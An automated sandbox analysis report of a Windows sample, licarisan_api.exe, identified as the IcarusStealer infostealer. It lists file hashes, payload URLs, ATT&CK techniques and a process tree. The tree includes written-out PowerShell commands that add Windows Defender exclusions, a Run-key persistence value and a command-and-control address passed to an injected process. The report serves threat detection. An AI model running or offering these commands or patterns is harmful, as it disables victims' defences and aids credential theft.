Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
05-10-2024 14:39
Static task
static1
Behavioral task
behavioral1
Sample
licarisan_api.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
licarisan_api.exe
Resource
win10-20240404-en
Behavioral task
behavioral3
Sample
licarisan_api.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral4
Sample
licarisan_api.exe
Resource
win11-20240802-en
General
-
Target
licarisan_api.exe
-
Size
3.9MB
-
MD5
65a683124fc4ca1839e95322370e2b0d
-
SHA1
7a7eafcfa4349e40cb15ab30b5c64d3415e60b96
-
SHA256
3ff0d50557b5ba7eb306048c0e20dd4304a75aeab0470fe213c5089a031a396f
-
SHA512
14b6d7d06f1bd02fffa5f0a4aecb8bbb7b1441597d9ac27a888f5ff441fce785809bd675c7ef7b1da7f99a8d61100e030b6c8b7b128515e8d713d4ffec54123f
-
SSDEEP
49152:bP70hwGvLJT/a9yLe7lAsYaxBjbdOGMneGzxgUgoJUcaqCDx6ITcP2MNoSPhaC+O:nUgoJUBZJoP2MNBajvXOSq
Malware Config
Extracted
icarusstealer
-
payload_url
https://blackhatsec.org/add.jpg
https://blackhatsec.org/remove.jpg
Signatures
-
IcarusStealer
Icarus is a modular stealer written in C# First adverts in July 2022.
-
Boot or Logon Autostart Execution: Active Setup 2 TTPs 1 IoCs
Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Active Setup\Installed Components explorer.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 3040 powershell.exe 2384 powershell.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\OcuulusUpdater = "C:\\Users\\Admin\\Music\\OcoulsUpdater\\EyesUpdater.exe" licarisan_api.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 2104 set thread context of 1164 2104 licarisan_api.exe 30 PID 1164 set thread context of 2560 1164 csc.exe 32 -
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language licarisan_api.exe -
Modifies registry class 5 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell explorer.exe Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff explorer.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 3040 powershell.exe 2384 powershell.exe -
Suspicious use of AdjustPrivilegeToken 14 IoCs
description pid Process Token: SeShutdownPrivilege 2684 explorer.exe Token: SeShutdownPrivilege 2684 explorer.exe Token: SeShutdownPrivilege 2684 explorer.exe Token: SeShutdownPrivilege 2684 explorer.exe Token: SeShutdownPrivilege 2684 explorer.exe Token: SeShutdownPrivilege 2684 explorer.exe Token: SeShutdownPrivilege 2684 explorer.exe Token: SeShutdownPrivilege 2684 explorer.exe Token: SeDebugPrivilege 2560 cvtres.exe Token: SeDebugPrivilege 3040 powershell.exe Token: SeDebugPrivilege 2384 powershell.exe Token: SeShutdownPrivilege 2684 explorer.exe Token: SeShutdownPrivilege 2684 explorer.exe Token: SeShutdownPrivilege 2684 explorer.exe -
Suspicious use of FindShellTrayWindow 27 IoCs
pid Process 2684 explorer.exe 2684 explorer.exe 2684 explorer.exe 2684 explorer.exe 2684 explorer.exe 2684 explorer.exe 2684 explorer.exe 2684 explorer.exe 2684 explorer.exe 2684 explorer.exe 2684 explorer.exe 2684 explorer.exe 2684 explorer.exe 2684 explorer.exe 2684 explorer.exe 2684 explorer.exe 2684 explorer.exe 2684 explorer.exe 2684 explorer.exe 2684 explorer.exe 2684 explorer.exe 2684 explorer.exe 2684 explorer.exe 2684 explorer.exe 2684 explorer.exe 2684 explorer.exe 2684 explorer.exe -
Suspicious use of SendNotifyMessage 17 IoCs
pid Process 2684 explorer.exe 2684 explorer.exe 2684 explorer.exe 2684 explorer.exe 2684 explorer.exe 2684 explorer.exe 2684 explorer.exe 2684 explorer.exe 2684 explorer.exe 2684 explorer.exe 2684 explorer.exe 2684 explorer.exe 2684 explorer.exe 2684 explorer.exe 2684 explorer.exe 2684 explorer.exe 2684 explorer.exe -
Suspicious use of WriteProcessMemory 38 IoCs
description pid Process procid_target PID 2104 wrote to memory of 1164 2104 licarisan_api.exe 30 PID 2104 wrote to memory of 1164 2104 licarisan_api.exe 30 PID 2104 wrote to memory of 1164 2104 licarisan_api.exe 30 PID 2104 wrote to memory of 1164 2104 licarisan_api.exe 30 PID 2104 wrote to memory of 1164 2104 licarisan_api.exe 30 PID 2104 wrote to memory of 1164 2104 licarisan_api.exe 30 PID 1164 wrote to memory of 2684 1164 csc.exe 31 PID 1164 wrote to memory of 2684 1164 csc.exe 31 PID 1164 wrote to memory of 2684 1164 csc.exe 31 PID 1164 wrote to memory of 2684 1164 csc.exe 31 PID 1164 wrote to memory of 2560 1164 csc.exe 32 PID 1164 wrote to memory of 2560 1164 csc.exe 32 PID 1164 wrote to memory of 2560 1164 csc.exe 32 PID 1164 wrote to memory of 2560 1164 csc.exe 32 PID 1164 wrote to memory of 2560 1164 csc.exe 32 PID 1164 wrote to memory of 2560 1164 csc.exe 32 PID 1164 wrote to memory of 2560 1164 csc.exe 32 PID 1164 wrote to memory of 2560 1164 csc.exe 32 PID 1164 wrote to memory of 2560 1164 csc.exe 32 PID 2684 wrote to memory of 2644 2684 explorer.exe 34 PID 2684 wrote to memory of 2644 2684 explorer.exe 34 PID 2684 wrote to memory of 2644 2684 explorer.exe 34 PID 2560 wrote to memory of 2592 2560 cvtres.exe 35 PID 2560 wrote to memory of 2592 2560 cvtres.exe 35 PID 2560 wrote to memory of 2592 2560 cvtres.exe 35 PID 2560 wrote to memory of 2592 2560 cvtres.exe 35 PID 2560 wrote to memory of 2828 2560 cvtres.exe 37 PID 2560 wrote to memory of 2828 2560 cvtres.exe 37 PID 2560 wrote to memory of 2828 2560 cvtres.exe 37 PID 2560 wrote to memory of 2828 2560 cvtres.exe 37 PID 2592 wrote to memory of 3040 2592 cmd.exe 39 PID 2592 wrote to memory of 3040 2592 cmd.exe 39 PID 2592 wrote to memory of 3040 2592 cmd.exe 39 PID 2592 wrote to memory of 3040 2592 cmd.exe 39 PID 2828 wrote to memory of 2384 2828 cmd.exe 40 PID 2828 wrote to memory of 2384 2828 cmd.exe 40 PID 2828 wrote to memory of 2384 2828 cmd.exe 40 PID 2828 wrote to memory of 2384 2828 cmd.exe 40 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\licarisan_api.exe"C:\Users\Admin\AppData\Local\Temp\licarisan_api.exe"1⤵
- Adds Run key to start application
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2104 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"2⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1164 -
C:\Windows\explorer.exe"C:\Windows\explorer.exe"3⤵
- Boot or Logon Autostart Execution: Active Setup
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2684 -
C:\Windows\system32\ctfmon.exectfmon.exe4⤵PID:2644
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client 193.142.146.64 8880 vUiuCXqqM3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2560 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2592 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3040
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2828 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2384
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
2Active Setup
1Registry Run Keys / Startup Folder
1Privilege Escalation
Boot or Logon Autostart Execution
2Active Setup
1Registry Run Keys / Startup Folder
1